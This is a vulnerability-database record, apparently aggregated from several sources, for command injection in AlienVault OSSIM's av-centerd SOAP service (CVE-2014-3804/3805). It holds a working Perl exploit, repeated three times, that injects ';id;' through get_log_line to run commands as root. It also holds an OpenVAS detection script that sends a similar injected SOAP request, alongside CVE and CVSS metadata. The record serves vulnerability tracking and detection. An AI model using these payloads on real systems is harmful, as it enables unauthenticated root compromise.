description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "AlienVault OSSIM < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-3805"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86990", "id": "SSV:86990", "sourceData": "\n # Exploit Title: AlienVault OSSIM < 4.7.0 av-centerd 'get_log_line()' Remote Code Execution\r\n# Date: 06/17/2014\r\n# Exploit Author: Alfredo Ramirez\r\n# Vendor Homepage: http://www.alienvault.com/\r\n# Software Link: http://www.alienvault.com/open-threat-exchange/projects\r\n# Version: < 4.7.0\r\n# Tested on: Debian/Virtual Appliance\r\n# CVE : CVE-2014-3805\r\n\r\n #!perl -w\r\n\r\n use SOAP::Lite;\r\n\r\n # SSL is self-signed so we have to ignore verification.\r\n $ENV{PERL_LWP_SSL_VERIFY_HOSTNAME}=0;\r\n\r\n # We simply append the 'id' command to the number of log we want to\r\n # read.\r\n @soap_response = SOAP::Lite\r\n -> uri('AV/CC/Util')\r\n -> proxy('https://172.26.22.2:40007/av-centerd')\r\n -> get_log_line('All', '423d7bea-cfbc-f7ea-fe52-272ff7ede3d2' ,'172.26.22.1', 'test', '/var/log/auth.log', '1;id;')\r\n -> result;\r\n\r\n for (@{ $soap_response[0] }) {\r\n print "$_\\n";\r\n }\r\n\r\n # If vulnerable output will be: uid=0(root) gid=0(root) groups=0(root)\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-86990", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:02", "description": "\nAlienvault Open Source SIEM (OSSIM) 4.7.0 - av-centerd get_log_line() Remote Code Execution", "edition": 2, "cvss3": {}, "published": "2014-06-18T00:00:00", "title": "Alienvault Open Source SIEM (OSSIM) 4.7.0 - av-centerd get_log_line() Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3805"], "modified": "2014-06-18T00:00:00", "id": "EXPLOITPACK:F65030A33A46E083528FF901D4F0FE37", "href": "", "sourceData": "# Exploit Title: AlienVault OSSIM < 4.7.0 av-centerd 'get_log_line()' Remote Code Execution\n# Date: 06/17/2014\n# Exploit Author: Alfredo Ramirez\n# Vendor Homepage: http://www.alienvault.com/\n# Software Link: http://www.alienvault.com/open-threat-exchange/projects\n# Version: < 4.7.0\n# Tested on: Debian/Virtual Appliance\n# CVE : CVE-2014-3805\n\n #!perl -w\n\n use SOAP::Lite;\n\n # SSL is self-signed so we have to ignore verification.\n $ENV{PERL_LWP_SSL_VERIFY_HOSTNAME}=0;\n\n # We simply append the 'id' command to the number of log we want to\n # read.\n @soap_response = SOAP::Lite\n -> uri('AV/CC/Util')\n -> proxy('https://172.26.22.2:40007/av-centerd')\n -> get_log_line('All', '423d7bea-cfbc-f7ea-fe52-272ff7ede3d2' ,'172.26.22.1', 'test', '/var/log/auth.log', '1;id;')\n -> result;\n\n for (@{ $soap_response[0] }) {\n print \"$_\\n\";\n }\n\n # If vulnerable output will be: uid=0(root) gid=0(root) groups=0(root)", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-05-26T09:02:13", "description": "An arbitrary command execution vulnerability exists in AlienVault OSSIM. The vulnerability is due to a failure to safely sanitize user data while handling SOAP service requests via the get_license function of Util.pm. A remote unauthenticated attacker can exploit this vulnerability by sending crafted requests to the affected service. Successful exploitation could result in arbitrary command execution with root privileges.", "cvss3": {}, "published": "2014-08-03T00:00:00", "type": "checkpoint_advisories", "title": "AlienVault OSSIM av-centerd Util.pm get_license Arbitrary Command Execution (CVE-2014-3805)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-3805"], "modified": "2014-07-29T00:00:00", "id": "CPAI-2014-1722", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2022-05-04T17:44:14", "description": "", "cvss3": {}, "published": "2014-06-18T00:00:00", "type": "exploitdb", "title": "Alienvault Open Source SIEM (OSSIM) < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2014-3805", "CVE-2014-3805"], "modified": "2014-06-18T00:00:00", "id": "EDB-ID:33805", "href": "https://www.exploit-db.com/exploits/33805", "sourceData": "# Exploit Title: AlienVault OSSIM < 4.7.0 av-centerd 'get_log_line()' Remote Code Execution\r\n# Date: 06/17/2014\r\n# Exploit Author: Alfredo Ramirez\r\n# Vendor Homepage: http://www.alienvault.com/\r\n# Software Link: http://www.alienvault.com/open-threat-exchange/projects\r\n# Version: < 4.7.0\r\n# Tested on: Debian/Virtual Appliance\r\n# CVE : CVE-2014-3805\r\n\r\n #!perl -w\r\n\r\n use SOAP::Lite;\r\n\r\n # SSL is self-signed so we have to ignore verification.\r\n $ENV{PERL_LWP_SSL_VERIFY_HOSTNAME}=0;\r\n\r\n # We simply append the 'id' command to the number of log we want to\r\n # read.\r\n @soap_response = SOAP::Lite\r\n -> uri('AV/CC/Util')\r\n -> proxy('https://172.26.22.2:40007/av-centerd')\r\n -> get_log_line('All', '423d7bea-cfbc-f7ea-fe52-272ff7ede3d2' ,'172.26.22.1', 'test', '/var/log/auth.log', '1;id;')\r\n -> result;\r\n\r\n for (@{ $soap_response[0] }) {\r\n print \"$_\\n\";\r\n }\r\n\r\n # If vulnerable output will be: uid=0(root) gid=0(root) groups=0(root)", "sourceHref": "https://www.exploit-db.com/download/33805", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T13:01:27", "description": "The av-centerd SOAP service in AlienVault OSSIM before 4.7.0 allows remote attackers to execute arbitrary commands via a crafted (1) update_system_info_debian_package, (2) ossec_task, (3) set_ossim_setup admin_ip, (4) sync_rserver, or (5) set_ossim_setup framework_ip request, a different vulnerability than CVE-2014-3805.", "cvss3": {}, "published": "2014-06-13T14:55:00", "type": "cve", "title": "CVE-2014-3804", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3804", "CVE-2014-3805"], "modified": "2017-09-16T01:29:00", "cpe": ["cpe:/a:alienvault:open_source_security_information_management:4.0.3", "cpe:/a:alienvault:open_source_security_information_management:4.5", "cpe:/a:alienvault:open_source_security_information_management:4.1.2", "cpe:/a:alienvault:open_source_security_information_management:4.6.1", "cpe:/a:alienvault:open_source_security_information_management:4.2", "cpe:/a:alienvault:open_source_security_information_management:4.6", "cpe:/a:alienvault:open_source_security_information_management:4.1", "cpe:/a:alienvault:open_source_security_information_management:4.0", "cpe:/a:alienvault:open_source_security_information_management:4.3.2", "cpe:/a:alienvault:open_source_security_information_management:4.0.4", "cpe:/a:alienvault:open_source_security_information_management:4.1.3", "cpe:/a:alienvault:open_source_security_information_management:4.2.3", "cpe:/a:alienvault:open_source_security_information_management:4.3.3", "cpe:/a:alienvault:open_source_security_information_management:4.3", "cpe:/a:alienvault:open_source_security_information_management:4.4", "cpe:/a:alienvault:open_source_security_information_management:4.3.1", "cpe:/a:alienvault:open_source_security_information_management:4.2.2"], "id": "CVE-2014-3804", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3804", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:alienvault:open_source_security_information_management:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.4:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.5:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:01:30", "description": "The av-centerd SOAP service in AlienVault OSSIM before 4.7.0 allows remote attackers to execute arbitrary commands via a crafted (1) get_license, (2) get_log_line, or (3) update_system/upgrade_pro_web request, a different vulnerability than CVE-2014-3804.", "cvss3": {}, "published": "2014-06-13T14:55:00", "type": "cve", "title": "CVE-2014-3805", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3804", "CVE-2014-3805"], "modified": "2017-09-16T01:29:00", "cpe": ["cpe:/a:alienvault:open_source_security_information_management:4.0.3", "cpe:/a:alienvault:open_source_security_information_management:4.5", "cpe:/a:alienvault:open_source_security_information_management:4.1.2", "cpe:/a:alienvault:open_source_security_information_management:4.6.1", "cpe:/a:alienvault:open_source_security_information_management:4.2", "cpe:/a:alienvault:open_source_security_information_management:4.6", "cpe:/a:alienvault:open_source_security_information_management:4.1", "cpe:/a:alienvault:open_source_security_information_management:4.0", "cpe:/a:alienvault:open_source_security_information_management:4.4", "cpe:/a:alienvault:open_source_security_information_management:4.3.2", "cpe:/a:alienvault:open_source_security_information_management:4.1.3", "cpe:/a:alienvault:open_source_security_information_management:4.0.4", "cpe:/a:alienvault:open_source_security_information_management:4.2.3", "cpe:/a:alienvault:open_source_security_information_management:4.3.3", "cpe:/a:alienvault:open_source_security_information_management:4.3", "cpe:/a:alienvault:open_source_security_information_management:4.3.1", "cpe:/a:alienvault:open_source_security_information_management:4.2.2"], "id": "CVE-2014-3805", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3805", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:alienvault:open_source_security_information_management:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.4:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.5:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:37:41", "description": "The av-centerd SOAP service in AlienVault OSSIM before 4.7.0 allows remote attackers to execute arbitrary commands via a crafted (1) remote_task or (2) get_license request, a different vulnerability than CVE-2014-3804 and CVE-2014-3805.", "cvss3": {}, "published": "2014-08-21T14:55:00", "type": "cve", "title": "CVE-2014-5210", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3804", "CVE-2014-3805", "CVE-2014-5210"], "modified": "2014-08-21T16:57:00", "cpe": ["cpe:/a:alienvault:open_source_security_information_management:4.5", "cpe:/a:alienvault:open_source_security_information_management:4.1.2", "cpe:/a:alienvault:open_source_security_information_management:2.1.5-1", "cpe:/a:alienvault:open_source_security_information_management:4.3.3", "cpe:/a:alienvault:open_source_security_information_management:3.1.12", "cpe:/a:alienvault:open_source_security_information_management:3.1", "cpe:/a:alienvault:open_source_security_information_management:2.1.5", "cpe:/a:alienvault:open_source_security_information_management:4.6", "cpe:/a:alienvault:open_source_security_information_management:4.1.3", "cpe:/a:alienvault:open_source_security_information_management:2.1.5-2", "cpe:/a:alienvault:open_source_security_information_management:2.1.5-3", "cpe:/a:alienvault:open_source_security_information_management:4.4", "cpe:/a:alienvault:open_source_security_information_management:4.6.1", "cpe:/a:alienvault:open_source_security_information_management:4.2", "cpe:/a:alienvault:open_source_security_information_management:4.0.4", "cpe:/a:alienvault:open_source_security_information_management:2.1.2", "cpe:/a:alienvault:open_source_security_information_management:1.0.6", "cpe:/a:alienvault:open_source_security_information_management:4.3", "cpe:/a:alienvault:open_source_security_information_management:4.2.2", "cpe:/a:alienvault:open_source_security_information_management:4.0.3", "cpe:/a:alienvault:open_source_security_information_management:4.1", "cpe:/a:alienvault:open_source_security_information_management:4.0", "cpe:/a:alienvault:open_source_security_information_management:4.3.2", "cpe:/a:alienvault:open_source_security_information_management:3.1.9", "cpe:/a:alienvault:open_source_security_information_management:2.1", "cpe:/a:alienvault:open_source_security_information_management:4.2.3", "cpe:/a:alienvault:open_source_security_information_management:3.1.10", "cpe:/a:alienvault:open_source_security_information_management:1.0.4", "cpe:/a:alienvault:open_source_security_information_management:4.3.1"], "id": "CVE-2014-5210", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5210", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:alienvault:open_source_security_information_management:4.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:3.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:2.1.5-1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.4:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.5:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:2.1.5-2:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:2.1.5-3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.1.2:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:37:11", "description": "AlienVault OSSIM is prone to multiple remote code execution\n vulnerabilities", "cvss3": {}, "published": "2014-06-20T00:00:00", "type": "openvas", "title": "AlienVault OSSIM Multiple Remote Code Execution Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-3804", "CVE-2014-3805"], "modified": "2019-02-14T00:00:00", "id": "OPENVAS:1361412562310105048", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105048", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ossim_67999.nasl 13659 2019-02-14 08:34:21Z cfischer $\n#\n# AlienVault OSSIM Multiple Unspecified Remote Code Execution Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:alienvault:open_source_security_information_management\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105048\");\n script_bugtraq_id(67999, 67998);\n script_cve_id(\"CVE-2014-3804\", \"CVE-2014-3805\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 13659 $\");\n\n script_name(\"AlienVault OSSIM Multiple Remote Code Execution Vulnerabilities\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/67999\");\n script_xref(name:\"URL\", value:\"http://www.alienvault.com/\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-14 09:34:21 +0100 (Thu, 14 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-20 12:08:51 +0200 (Fri, 20 Jun 2014)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_ossim_web_detect.nasl\");\n script_require_ports(\"Services/www\", 40007);\n script_mandatory_keys(\"OSSIM/installed\");\n\n script_tag(name:\"impact\", value:\"An attacker can leverage these issues to execute arbitrary code with\n root privileges.\");\n script_tag(name:\"vuldetect\", value:\"Send a special crafted HTTP SOAP request and check the response.\");\n script_tag(name:\"insight\", value:\"The application fails to sufficiently sanitize user-supplied\n input.\");\n script_tag(name:\"solution\", value:\"Updates are available.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"AlienVault OSSIM is prone to multiple remote code execution\n vulnerabilities\");\n script_tag(name:\"affected\", value:\"AlienVault OSSIM 4.6.1 and prior are vulnerable.\");\n\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! wport = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( cpe:CPE, port:wport ) ) exit( 0 );\n\nport = 40007;\nif( ! get_port_state( port ) ) exit( 0 );\n\nuseragent = http_get_user_agent();\ncmd = 'id';\nhost = http_host_name(port:port);\n\nsoap = \"<soap:Envelope soap:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/' xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/' \" +\n \"xmlns:soapenc='http://schemas.xmlsoap.org/soap/encoding/' xmlns:xsd='http://www.w3.org/2001/XMLSchema' xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\" +\n \"<soap:Body><update_system_info_debian_package xmlns='AV/CC/Util'><c-gensym3 xsi:type='xsd:string'>OpenVAS</c-gensym3><c-gensym5 xsi:type='xsd:string'>OpenVAS</c-gensym5>\" +\n \"<c-gensym7 xsi:type='xsd:string'>OpenVAS</c-gensym7><c-gensym9 xsi:type='xsd:string'>OpenVAS</c-gensym9><c-gensym11 xsi:type='xsd:string'>;\" +\n cmd +\n \"</c-gensym11></update_system_info_debian_package></soap:Body></soap:Envelope>\";\n\nlen = strlen( soap );\n\nreq = 'POST /av-centerd HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'SOAPAction: \"AV/CC/Util#update_system_info_debian_package\"\\r\\n' +\n 'Content-Type: text/xml; charset=UTF-8\\r\\n' +\n 'Content-Length: ' + len + '\\r\\n' +\n '\\r\\n' +\n soap;\nbuf = http_send_recv(port:port, data:req, bodyonly:FALSE);\n\nif( buf =~ \"uid=[0-9]+.*gid=[0-9]+\" )\n{\n req_resp = 'Request:\\n' + req + '\\n\\nResponse:\\n' + buf;\n security_message( port:port, expert_info:req_resp );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
